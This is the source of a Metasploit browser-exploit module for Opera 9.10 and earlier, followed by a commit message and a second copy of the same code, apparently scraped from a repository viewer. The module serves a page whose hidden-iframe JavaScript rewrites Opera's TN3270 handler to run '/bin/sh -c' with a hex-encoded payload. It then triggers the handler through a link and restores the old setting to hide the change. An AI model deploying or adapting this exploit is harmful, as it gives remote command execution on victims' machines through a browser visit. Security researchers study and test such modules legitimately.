metasploit-framework/modules/exploits/multi/browser/opera_configoverwrite.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	#
	# This module acts as an HTTP server
	#
	include Msf::Exploit::Remote::HttpServer::HTML

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name => HttpClients::OPERA,
		:ua_ver => "1.0",
		:os_name => [ OperatingSystems::WINDOWS, OperatingSystems::LINUX ],
		:javascript => true,
		:rank => ExcellentRanking, # reliable exe writer
		:vuln_test => nil,
	})

	def initialize(info = {})
		super(update_info(info,{
			'Name'           => 'Opera 9 Configuration Overwrite',
			'Description'    => %q{
				Opera web browser in versions <= 9.10 allows unrestricted script
				access to its configuration page, opera:config, allowing an
				attacker to change settings and potentially execute arbitrary
				code.
			},
			'License'        => BSD_LICENSE,
			'Author'         =>
				[
					'egypt', # stolen from mpack
				],
			'Version'        => '$Revision: 6655 $',
			'References'     => [ ],
			'Payload'        =>
				{
					'ExitFunc' => 'process',
					'Space'    => 4000,
					'DisableNops' => true,
					'BadChars' => " |'<>&",
				},
			'Targets'        =>
				[
					#[ 'Opera < 9.10 Windows', 
					#	{
					#		'Platform' => 'win',
					#		'Arch' => ARCH_X86,
					#	}
					#],
					[ 'Opera < 9.10 Unix Cmd', 
						{
							'Platform' => 'unix',
							'Arch' => ARCH_CMD,
						}
					],
				],
			# Not sure when this was disclosed but it's been known since at
			# least March 5, 2007, since that's the release date on the version
			# of mpack I stole this from.
			'DisclosureDate' => 'Mar 5 2007'
			}))
	end

	def on_request_uri(cli, request)

		case request.uri
		when /payload$/
			print_status("Generating payload for #{target} #{target.platform}")
			# Re-generate the payload
			if ((p = regenerate_payload(cli)) == nil)
				print_error("Payload generation failed, 404ing request for #{request.uri}")
				send_not_found(cli)
				return
			end
			# NOTE: Change this to the new API when commiting to trunk
			#content = Msf::Util::EXE.to_win32pe(p.encoded)
			#content = Rex::Text.to_win32pe(p.encoded)
			content = "foo"
			print_status("Generated #{content.length} bytes")
			headers = { 'Content-Type' => 'application/octet-stream' }
		when get_resource
			print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
			content =  "<body><script>"
			content << generate_evil_js(cli, request)
			content << "</script></body>"
			headers = { 'Content-Type' => 'text/html' }
		else
			print_status("404ing request for #{request.uri}")
			send_not_found(cli)
			return
		end
		send_response_html(cli, content, headers)

	end

	def generate_evil_js(cli, request)
		# There are a bunch of levels of quotes here, so the easiest way to
		# make everything line up is to hex escape the command to run
		p = regenerate_payload(cli).encoded
		#print_status(p)
		shellcode = Rex::Text.to_hex(p, "%")
		js = <<ENDJS
blank_iframe = document.createElement('iframe');
blank_iframe.src = 'about:blank';
blank_iframe.setAttribute('id', 'blank_iframe_window');
blank_iframe.setAttribute('style', 'display:none');
document.body.appendChild(blank_iframe);
blank_iframe_window.eval(
	"config_iframe = document.createElement('iframe');" +
    "config_iframe.setAttribute('id', 'config_iframe_window');" +
    "config_iframe.src = 'opera:config';" +
    "document.body.appendChild(config_iframe);" +
    "cache_iframe = document.createElement('iframe');" +
    "cache_iframe.src = 'opera:cache';" +
    "cache_iframe.onload = function ()" +
    "{" +
    "	config_iframe_window.eval" +
    "	(\\"" +
	"	old_handler = opera.getPreference('Network','TN3270 App');" +
	"	shellcode = '#{shellcode}';" +
    "	opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
    "	app_link = document.createElement('a');" +
    "	app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +
    "	app_link.click();" +
    "	setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
    "	\\");" +
    "};" +
    "document.body.appendChild(cache_iframe);" +
"");
ENDJS

	end

	def generate_evil_preference()

	end

end
merge browser_autopwn back into trunk. This changes the database schema slightly, so make sure to db_destroy and db_create before using the database features. git-svn-id: file:///home/svn/framework3/trunk@6873 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-22 20:14:35 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`


			`require 'msf/core'`


			`class Metasploit3 < Msf::Exploit::Remote`

			`#`
			`# This module acts as an HTTP server`
			`#`
			`include Msf::Exploit::Remote::HttpServer::HTML`

			`include Msf::Exploit::Remote::BrowserAutopwn`
			`autopwn_info({`
			`:ua_name => HttpClients::OPERA,`
			`:ua_ver => "1.0",`
			`:os_name => [ OperatingSystems::WINDOWS, OperatingSystems::LINUX ],`
			`:javascript => true,`
			`:rank => ExcellentRanking, # reliable exe writer`
			`:vuln_test => nil,`
			`})`

			`def initialize(info = {})`
			`super(update_info(info,{`
			`'Name' => 'Opera 9 Configuration Overwrite',`
			`'Description' => %q{`
			`Opera web browser in versions <= 9.10 allows unrestricted script`
			`access to its configuration page, opera:config, allowing an`
			`attacker to change settings and potentially execute arbitrary`
			`code.`
			`},`
			`'License' => BSD_LICENSE,`
			`'Author' =>`
			`[`
			`'egypt', # stolen from mpack`
			`],`
			`'Version' => '$Revision: 6655 $',`
			`'References' => [ ],`
			`'Payload' =>`
			`{`
			`'ExitFunc' => 'process',`
			`'Space' => 4000,`
			`'DisableNops' => true,`
			`'BadChars' => " \|'<>&",`
			`},`
			`'Targets' =>`
			`[`
			`#[ 'Opera < 9.10 Windows',`
			`# {`
			`# 'Platform' => 'win',`
			`# 'Arch' => ARCH_X86,`
			`# }`
			`#],`
			`[ 'Opera < 9.10 Unix Cmd',`
			`{`
			`'Platform' => 'unix',`
			`'Arch' => ARCH_CMD,`
			`}`
			`],`
			`],`
			`# Not sure when this was disclosed but it's been known since at`
			`# least March 5, 2007, since that's the release date on the version`
			`# of mpack I stole this from.`
			`'DisclosureDate' => 'Mar 5 2007'`
			`}))`
			`end`

			`def on_request_uri(cli, request)`

			`case request.uri`
			`when /payload$/`
			`print_status("Generating payload for #{target} #{target.platform}")`
			`# Re-generate the payload`
			`if ((p = regenerate_payload(cli)) == nil)`
			`print_error("Payload generation failed, 404ing request for #{request.uri}")`
			`send_not_found(cli)`
			`return`
			`end`
			`# NOTE: Change this to the new API when commiting to trunk`
			`#content = Msf::Util::EXE.to_win32pe(p.encoded)`
			`#content = Rex::Text.to_win32pe(p.encoded)`
			`content = "foo"`
			`print_status("Generated #{content.length} bytes")`
			`headers = { 'Content-Type' => 'application/octet-stream' }`
			`when get_resource`
			`print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")`
			`content = "<body><script>"`
			`content << generate_evil_js(cli, request)`
			`content << "</script></body>"`
			`headers = { 'Content-Type' => 'text/html' }`
			`else`
			`print_status("404ing request for #{request.uri}")`
			`send_not_found(cli)`
			`return`
			`end`
			`send_response_html(cli, content, headers)`

			`end`

			`def generate_evil_js(cli, request)`
			`# There are a bunch of levels of quotes here, so the easiest way to`
			`# make everything line up is to hex escape the command to run`
			`p = regenerate_payload(cli).encoded`
			`#print_status(p)`
			`shellcode = Rex::Text.to_hex(p, "%")`
			`js = <<ENDJS`
			`blank_iframe = document.createElement('iframe');`
			`blank_iframe.src = 'about:blank';`
			`blank_iframe.setAttribute('id', 'blank_iframe_window');`
			`blank_iframe.setAttribute('style', 'display:none');`
			`document.body.appendChild(blank_iframe);`
			`blank_iframe_window.eval(`
			`"config_iframe = document.createElement('iframe');" +`
			`"config_iframe.setAttribute('id', 'config_iframe_window');" +`
			`"config_iframe.src = 'opera:config';" +`
			`"document.body.appendChild(config_iframe);" +`
			`"cache_iframe = document.createElement('iframe');" +`
			`"cache_iframe.src = 'opera:cache';" +`
			`"cache_iframe.onload = function ()" +`
			`"{" +`
			`" config_iframe_window.eval" +`
			`" (\\"" +`
			`" old_handler = opera.getPreference('Network','TN3270 App');" +`
			`" shellcode = '#{shellcode}';" +`
			`" opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +`
			`" app_link = document.createElement('a');" +`
			`" app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +`
			`" app_link.click();" +`
			`" setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +`
			`" \\");" +`
			`"};" +`
			`"document.body.appendChild(cache_iframe);" +`
			`"");`
			`ENDJS`

			`end`

			`def generate_evil_preference()`

			`end`

			`end`